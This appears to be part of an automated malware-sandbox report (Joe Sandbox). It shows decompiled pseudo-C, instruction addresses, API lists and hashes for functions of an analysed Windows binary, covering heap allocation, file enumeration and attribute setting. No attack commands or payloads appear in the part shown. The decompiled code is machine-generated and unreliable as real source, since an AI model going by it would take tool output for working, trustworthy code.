                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                              • Instruction ID: 9d10d91046bd1a4dd32f0e664b06ea8990f5f8cc09720d5c411fd584516079ca
                              • Opcode Fuzzy Hash: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                              • Instruction Fuzzy Hash: 83313031901254DBCB11EFA4C6487EDBBB5AF15304F1440AEE8057B382DB78DE49DBA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00404C4A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E00404C4A(intOrPtr* __ecx, void* __eflags) {
				void* _t33;
				intOrPtr _t43;
				void* _t47;
				intOrPtr _t53;
				intOrPtr* _t82;
				void* _t84;
				void* _t86;
				intOrPtr _t87;

				E00413954(E004195D4, _t84);
				_t87 = _t86 - 0x64;
				_t82 = __ecx;
				E00404D51(_t84 - 0x70);
				_t53 = 0;
				_push(0x5c);
				 *((intOrPtr*)(_t84 - 4)) = 0;
				E00405468(_t84 - 0x1c, __ecx);
				_push(0x2a);
				 *((char*)(_t84 - 4)) = 1;
				_t33 = E00405468(_t84 - 0x28, _t84 - 0x1c);
				 *(_t84 - 0x38) =  *(_t84 - 0x38) | 0xffffffff;
				 *((char*)(_t84 - 4)) = 3;
				E00403D24(_t84 - 0x34, _t33);
				 *((char*)(_t84 - 4)) = 5;
				E00403A9C( *((intOrPtr*)(_t84 - 0x28)));
				while(E00405949(_t84 - 0x38, _t84 - 0x70) != 0) {
					_t87 = _t87 - 0xc;
					 *((intOrPtr*)(_t84 - 0x10)) = _t87;
					E00403D24(_t87, _t84 - 0x1c);
					_t47 = E00404D6C(_t84 - 0x70); // executed
					if(_t47 != _t53) {
						continue;
					} else {
						 *((char*)(_t84 - 4)) = 1;
						E00403A9C( *((intOrPtr*)(_t84 - 0x34)));
						E0040551A(_t84 - 0x38);
						E00403A9C( *((intOrPtr*)(_t84 - 0x1c)));
						E00403A9C( *((intOrPtr*)(_t84 - 0x48)));
						_t43 = 0;
					}
					L7:
					 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
					return _t43;
				}
				 *((char*)(_t84 - 4)) = 1;
				E00403A9C( *((intOrPtr*)(_t84 - 0x34)));
				E0040551A(_t84 - 0x38);
				if(E0040489C( *_t82, 0) != 0) {
					_t53 = E004048AA( *_t82);
				}
				E00403A9C( *((intOrPtr*)(_t84 - 0x1c)));
				E00403A9C( *((intOrPtr*)(_t84 - 0x48)));
				_t43 = _t53;
				goto L7;
			}











                              0x00404c4f
                              0x00404c54
                              0x00404c59
                              0x00404c5f
                              0x00404c64
                              0x00404c66
                              0x00404c6d
                              0x00404c70
                              0x00404c75
                              0x00404c7d
                              0x00404c81
                              0x00404c86
                              0x00404c8e
                              0x00404c92
                              0x00404c9a
                              0x00404c9e
                              0x00404ca4
                              0x00404cb4
                              0x00404cbc
                              0x00404cc3
                              0x00404cca
                              0x00404cd1
                              0x00000000
                              0x00404cd3
                              0x00404cd6
                              0x00404cda
                              0x00404ce3
                              0x00404ceb
                              0x00404cf3
                              0x00404cf9
                              0x00404cfb
                              0x00404d3d
                              0x00404d42
                              0x00404d4b
                              0x00404d4b
                              0x00404d01
                              0x00404d05
                              0x00404d0e
                              0x00404d1e
                              0x00404d27
                              0x00404d27
                              0x00404d2c
                              0x00404d34
                              0x00404d3a
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 00404C4F
                                • Part of subcall function 00405468: __EH_prolog.LIBCMT ref: 0040546D
                                • Part of subcall function 00404D6C: __EH_prolog.LIBCMT ref: 00404D71
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 2d58e100b0e8a5684ba942a8d61a2b33c9f58aa7325c5ec0ae0d3fb5809bcd36
                              • Instruction ID: 9114e62b92f145f299bca9ec68259fa3d4e050d8b6bab90f4208dc7235d8fbe8
                              • Opcode Fuzzy Hash: 2d58e100b0e8a5684ba942a8d61a2b33c9f58aa7325c5ec0ae0d3fb5809bcd36
                              • Instruction Fuzzy Hash: 1A31AF71901209AADF05FFE1E842AEEBF75AF50318F10402FE441332D2CE795A4ADE59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00413EA3 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 24%
                              			E00413EA3(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x41b988);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x425a38; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x42283c; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E0041570A(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = E00416894(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E00413F69();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x425a30; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x425a34); // executed
					} else {
						E0041570A(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = E00415DF1();
						_v8 = _v8 | 0xffffffff;
						E00413F0A();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}
















                              0x00413ea6
                              0x00413ea8
                              0x00413ead
                              0x00413eb8
                              0x00413eb9
                              0x00413ec6
                              0x00413ece
                              0x00413f13
                              0x00413f16
                              0x00000000
                              0x00413f18
                              0x00413f18
                              0x00413f1b
                              0x00413f1d
                              0x00413f29
                              0x00413f1f
                              0x00413f1f
                              0x00413f22
                              0x00413f22
                              0x00413f2a
                              0x00413f2d
                              0x00413f33
                              0x00413f63
                              0x00413f63
                              0x00000000
                              0x00413f35
                              0x00413f37
                              0x00413f3c
                              0x00413f3d
                              0x00413f50
                              0x00413f53
                              0x00413f57
                              0x00413f5c
                              0x00413f5f
                              0x00413f61
                              0x00000000
                              0x00000000
                              0x00413f61
                              0x00413f33
                              0x00413ed0
                              0x00413ed0
                              0x00413ed3
                              0x00413ed9
                              0x00413f72
                              0x00413f72
                              0x00413f75
                              0x00413f77
                              0x00413f7b
                              0x00413f7b
                              0x00413f7f
                              0x00413f7f
                              0x00413f81
                              0x00413f82
                              0x00413f82
                              0x00413f8a
                              0x00413edf
                              0x00413ee1
                              0x00413ee7
                              0x00413eeb
                              0x00413ef2
                              0x00413ef5
                              0x00413ef9
                              0x00413efe
                              0x00413f03
                              0x00000000
                              0x00000000
                              0x00413f05
                              0x00413f03
                              0x00413ed9
                              0x00413f93
                              0x00413f9e

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 00413F8A
                                • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$AllocateEnterHeapInitialize
                              • String ID:
                              • API String ID: 1616793339-0
                              • Opcode ID: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                              • Instruction ID: 7c2cfac85a053aeac9454e1c2b35b253285297f11283e44f43d764ba5cf7311f
                              • Opcode Fuzzy Hash: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                              • Instruction Fuzzy Hash: 1A217431E44605EBDB10AFA9DC42BDAB7B4EB01765F10421BF411EB2D0C778AAC28A58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00413F9F Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 30%
                              			E00413F9F(intOrPtr _a4) {
				signed int _v8;
				char _v20;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _t19;
				intOrPtr _t20;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr _t40;
				char _t42;
				intOrPtr _t49;

				_push(0xffffffff);
				_push(0x41b9a0);
				_push(E00414A2C);
				_t19 =  *[fs:0x0];
				_push(_t19);
				 *[fs:0x0] = _t42;
				_t40 = _a4;
				if(_t40 != 0) {
					_t20 =  *0x425a38; // 0x1
					if(_t20 != 3) {
						if(_t20 != 2) {
							_push(_t40);
							goto L12;
						} else {
							E0041570A(9);
							_v8 = 1;
							_t24 = E004167F8(_t40,  &_v44,  &_v36);
							_v40 = _t24;
							if(_t24 != 0) {
								E0041684F(_v44, _v36, _t24);
							}
							_v8 = _v8 | 0xffffffff;
							_t19 = E00414061();
							goto L9;
						}
					} else {
						E0041570A(9);
						_v8 = _v8 & 0x00000000;
						_t27 = E00415A9D(_t40);
						_v32 = _t27;
						if(_t27 != 0) {
							_push(_t40);
							_push(_t27);
							E00415AC8();
						}
						_v8 = _v8 | 0xffffffff;
						_t19 = E00414009();
						_t49 = _v32;
						L9:
						if(_t49 == 0) {
							_push(_a4);
							L12:
							_push(0);
							_t19 = RtlFreeHeap( *0x425a34); // executed
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t19;
			}
















                              0x00413fa2
                              0x00413fa4
                              0x00413fa9
                              0x00413fae
                              0x00413fb4
                              0x00413fb5
                              0x00413fc2
                              0x00413fc7
                              0x00413fcd
                              0x00413fd5
                              0x00414015
                              0x0041406a
                              0x00000000
                              0x00414017
                              0x00414019
                              0x0041401f
                              0x0041402f
                              0x00414037
                              0x0041403c
                              0x00414045
                              0x0041404a
                              0x0041404d
                              0x00414051
                              0x00000000
                              0x00414056
                              0x00413fd7
                              0x00413fd9
                              0x00413fdf
                              0x00413fe4
                              0x00413fea
                              0x00413fef
                              0x00413ff1
                              0x00413ff2
                              0x00413ff3
                              0x00413ff9
                              0x00413ffa
                              0x00413ffe
                              0x00414003
                              0x0041405a
                              0x0041405a
                              0x0041405c
                              0x0041406b
                              0x0041406b
                              0x00414073
                              0x00414073
                              0x0041405a
                              0x00413fd5
                              0x0041407c
                              0x00414087

                              APIs
                              • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074), ref: 00414073
                                • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapInitialize
                              • String ID:
                              • API String ID: 641406236-0
                              • Opcode ID: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                              • Instruction ID: 47133188c5d3e4a4a91398ef735a592283a7fe3b34e77d79aa204ad2d485eaa9
                              • Opcode Fuzzy Hash: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                              • Instruction Fuzzy Hash: 8321C572901609EADB20ABA6DC46BDE7B78EF48764F14021BF511B61C0D77C89C18AAD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040A011 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                              Download Yara Rule
                              C-Code - Quality: 87%
                              			E0040A011(signed int __ecx, void* __eflags) {
				void* _t28;
				intOrPtr* _t42;
				intOrPtr* _t43;
				void* _t49;

				E00413954(E00419E67, _t49);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t49 - 0x10)) = __ecx;
				 *(_t49 - 4) = 4;
				E004042AD(__ecx + 0xb4);
				 *(_t49 - 4) = 3;
				E004042AD(__ecx + 0xa0);
				_t42 = __ecx + 0x8c;
				 *((intOrPtr*)(_t49 - 0x14)) = _t42;
				 *_t42 = 0x41b6c0;
				 *(_t49 - 4) = 5;
				E004042D6();
				 *(_t49 - 4) = 2;
				E004042AD(_t42);
				_t43 = __ecx + 0x78;
				 *((intOrPtr*)(_t49 - 0x14)) = _t43;
				 *_t43 = 0x41b6c8;
				 *(_t49 - 4) = 6;
				E004042D6();
				 *(_t49 - 4) = 1;
				E004042AD(_t43);
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				E00407868(__ecx);
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				asm("sbb ecx, ecx");
				_t28 = E00409C49( ~__ecx & __ecx + 0x00000014,  ~__ecx & __ecx + 0x00000014); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t28;
			}







                              0x0040a016
                              0x0040a01b
                              0x0040a01c
                              0x0040a021
                              0x0040a02a
                              0x0040a031
                              0x0040a03c
                              0x0040a040
                              0x0040a045
                              0x0040a04b
                              0x0040a04e
                              0x0040a056
                              0x0040a05a
                              0x0040a061
                              0x0040a065
                              0x0040a06a
                              0x0040a06d
                              0x0040a070
                              0x0040a078
                              0x0040a07c
                              0x0040a083
                              0x0040a087
                              0x0040a08c
                              0x0040a092
                              0x0040a097
                              0x0040a0a2
                              0x0040a0a6
                              0x0040a0b0
                              0x0040a0b8

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040A016
                                • Part of subcall function 00409C49: __EH_prolog.LIBCMT ref: 00409C4E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                              • Instruction ID: 1dffea12e82b47f2a36155f0264cd4dada82ecc0bfe076f3ab6191fd12039e28
                              • Opcode Fuzzy Hash: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                              • Instruction Fuzzy Hash: 4C118FB0A01254DADB09EBAAC5153EDFBA69FA1318F14419FA542732D2CBF81B048666
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004092E9 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                              Download Yara Rule
                              C-Code - Quality: 81%
                              			E004092E9(void* __ecx, void* __eflags) {
				signed char _t22;
				void* _t24;
				void* _t45;
				void* _t47;

				E00413954(E00419BF8, _t47);
				_t45 = __ecx;
				_t41 = __ecx + 0x10;
				E00401D7A(__ecx + 0x10,  *((intOrPtr*)(_t47 + 8)));
				_push( *((intOrPtr*)(_t47 + 0xc)));
				_push( *((intOrPtr*)(E00402634(_t47 - 0x18, _t41))));
				 *(_t47 - 4) = 0;
				_t22 = E00405841(__ecx + 0x20, _t41); // executed
				asm("sbb bl, bl");
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				E00403A9C( *((intOrPtr*)(_t47 - 0x18)));
				if( ~_t22 + 1 != 0) {
					 *((intOrPtr*)(_t47 + 8)) = 1;
					E00413D3D(_t47 + 8, 0x41c4c0);
				}
				_t24 = E004042D6();
				 *(_t45 + 0x58) =  *(_t45 + 0x58) & 0x00000000;
				 *((intOrPtr*)(_t45 + 0x88)) = 0;
				 *((intOrPtr*)(_t45 + 0x8c)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t24;
			}







                              0x004092ee
                              0x004092f8
                              0x004092fe
                              0x00409303
                              0x00409308
                              0x00409315
                              0x0040931c
                              0x0040931f
                              0x0040932b
                              0x0040932d
                              0x00409333
                              0x0040933b
                              0x00409346
                              0x0040934d
                              0x0040934d
                              0x00409355
                              0x0040935a
                              0x00409361
                              0x00409367
                              0x00409370
                              0x00409378

                              APIs
                              • __EH_prolog.LIBCMT ref: 004092EE
                                • Part of subcall function 00402634: __EH_prolog.LIBCMT ref: 00402639
                                • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                • Part of subcall function 00413D3D: RaiseException.KERNEL32(00000003,00000000,00000003,?,00000003,?,00000003,00000000,00000000,00401055,00000003,?,00000000), ref: 00413D6B
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$ExceptionRaise
                              • String ID:
                              • API String ID: 2062786585-0
                              • Opcode ID: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                              • Instruction ID: f7fbb3e9a8787d76bf0f9f15101cef5fd9d7ebfa1ebb25f778e30044bb5e9d70
                              • Opcode Fuzzy Hash: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                              • Instruction Fuzzy Hash: 7B01D6766406049ACB10EF25C451ADEBBB1FF95318F00852FE896632E1CB785649CF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00404D6C Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                              Download Yara Rule
                              C-Code - Quality: 64%
                              			E00404D6C(void* __ecx) {
				signed char _t18;
				intOrPtr* _t24;
				void* _t25;
				void* _t27;
				void* _t30;
				void* _t41;

				E00413954(E004195F0, _t41);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				_t18 =  *(__ecx + 0x20) >> 4;
				_t46 = _t18 & 0x00000001;
				if((_t18 & 0x00000001) == 0) {
					_t30 = __ecx + 0x28;
					__eflags = _t30;
					_push(_t30);
					_t27 = E00404BDC( *((intOrPtr*)(E00405417(_t41 - 0x18, _t41 + 8))), __eflags);
					_push( *((intOrPtr*)(_t41 - 0x18)));
				} else {
					_push(__ecx + 0x28);
					_t24 = E00405417(_t41 - 0x18, _t41 + 8);
					 *(_t41 - 4) = 1;
					_t25 = E00404C4A(_t24, _t46); // executed
					_t27 = _t25;
					_push( *((intOrPtr*)(_t41 - 0x18)));
				}
				E00403A9C();
				E00403A9C( *((intOrPtr*)(_t41 + 8)));
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t27;
			}









                              0x00404d71
                              0x00404d7d
                              0x00404d81
                              0x00404d84
                              0x00404d86
                              0x00404da9
                              0x00404da9
                              0x00404daf
                              0x00404dbf
                              0x00404dc1
                              0x00404d88
                              0x00404d8e
                              0x00404d92
                              0x00404d99
                              0x00404d9d
                              0x00404da2
                              0x00404da4
                              0x00404da4
                              0x00404dc4
                              0x00404dcc
                              0x00404dd9
                              0x00404de1

                              APIs
                              • __EH_prolog.LIBCMT ref: 00404D71
                                • Part of subcall function 00405417: __EH_prolog.LIBCMT ref: 0040541C
                                • Part of subcall function 00404C4A: __EH_prolog.LIBCMT ref: 00404C4F
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 0829d6d4e2349ba8d3de6fc09fd6bc5a7f7a281632d8264b3d1e6490f9b222f7
                              • Instruction ID: f66e6ca9409e8e8da17af4a7d05db337a423f76100d3163e29410ef6f876c1fe
                              • Opcode Fuzzy Hash: 0829d6d4e2349ba8d3de6fc09fd6bc5a7f7a281632d8264b3d1e6490f9b222f7
                              • Instruction Fuzzy Hash: 4901A2B25101049ACB09EF90C852BED7B70EF94308F00412FE505776D2DB395A99CA48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004027A6 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004027A6(void* __ecx) {
				void* _t17;
				signed int _t31;
				intOrPtr _t34;
				void* _t36;

				E00413954(E0041919C, _t36);
				E00401CE1(_t36 - 0x18, __ecx + 0x10);
				_t34 =  *((intOrPtr*)(_t36 + 8));
				_t31 = 0;
				 *((intOrPtr*)(_t36 - 4)) = 0;
				if( *((intOrPtr*)(_t34 + 8)) > 0) {
					do {
						E00401DE3(_t36 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0xc)) + _t31 * 4)));
						E0040499C( *((intOrPtr*)(_t36 - 0x18))); // executed
						E00401DB8(_t36 - 0x18, 0x5c);
						_t31 = _t31 + 1;
					} while (_t31 <  *((intOrPtr*)(_t34 + 8)));
				}
				_t17 = E00403A9C( *((intOrPtr*)(_t36 - 0x18)));
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t17;
			}







                              0x004027ab
                              0x004027bc
                              0x004027c1
                              0x004027c4
                              0x004027c6
                              0x004027cc
                              0x004027ce
                              0x004027d7
                              0x004027df
                              0x004027e9
                              0x004027ee
                              0x004027ef
                              0x004027ce
                              0x004027f7
                              0x00402802
                              0x0040280a

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
                              • Instruction ID: 116dfd3529ede02fc162d870fedee277598c738aed7d6567ac0ffa60a71ea666
                              • Opcode Fuzzy Hash: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
                              • Instruction Fuzzy Hash: BCF04F719005069BDB15EB9AC892AEFBBB5FF80308F00403FE142775E2CA787985DB84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004048B7 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004048B7(WCHAR* __ecx, long __edx) {
				char _v16;
				void* __ebp;
				signed int _t5;
				void* _t9;

				if( *0x423148 != 0) {
					_t5 = SetFileAttributesW(__ecx, __edx); // executed
					return _t5 & 0xffffff00 | _t5 != 0x00000000;
				}
				_t9 = E0040489C( *((intOrPtr*)(E004048FF( &_v16, __ecx))), __edx);
				E00403A9C(_v16);
				return _t9;
			}







                              0x004048c7
                              0x004048f1
                              0x00000000
                              0x004048f9
                              0x004048da
                              0x004048e4
                              0x00000000

                              APIs
                              • SetFileAttributesW.KERNELBASE ref: 004048F1
                                • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
